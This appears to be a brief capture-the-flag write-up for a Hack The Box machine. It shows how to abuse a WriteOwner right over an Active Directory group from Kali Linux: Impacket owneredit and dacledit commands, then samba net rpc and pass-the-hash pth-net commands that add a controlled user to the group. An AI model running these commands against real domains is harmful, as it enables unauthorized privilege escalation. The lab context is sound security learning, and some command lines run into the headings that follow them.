Recently I was solving a box and got into situation where:
The user JUDITH.MADER@CERTIFIED.HTB has the ability to modify the owner of the group MANAGEMENT@CERTIFIED.HTB.
Object owners retain the ability to modify object security descriptors, regardless of permissions on the object’s DACL.
Without WinRM or RDP access, I have to perform the attack from my Kali machine.
Abuse using Linux:
To change the ownership of the object, you may use Impacket’s owneredit example script (cf. “grant ownership” reference for the exact link).
Impacket-Owner -action write -new-owner 'attacker' -target-dn 'groupDistinguidedName' 'DOMAIN'/'USER':'PASSWORD'Modifying the rights
To abuse ownership of a group object, you may grant yourself the AddMember permission.
Impacket’s dacledit can be used for that purpose (cf. “grant rights” reference for the link).
Impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'groupDistinguidedName' 'domain'/'controlledUser':'password'Adding to the group
You can now add members to the group.
Use samba’s net tool to add the user to the target group. The credentials can be supplied in cleartext or prompted interactively if omitted from the command line:
net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"It can also be done with pass-the-hash using pth-toolkit’s net tool. If the LM hash is not known, use ‘ffffffffffffffffffffffffffffffff’.
pth-net rpc group addmem "TargetGroup" "TargetUser" -U "DOMAIN"/"ControlledUser"%"LMhash":"NThash" -S "DomainController"Finally, verify that the user was successfully added to the group:
net rpc group members "TargetGroup" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"This guidance is based on the BloodHound tool, which can be used to identify the attack path.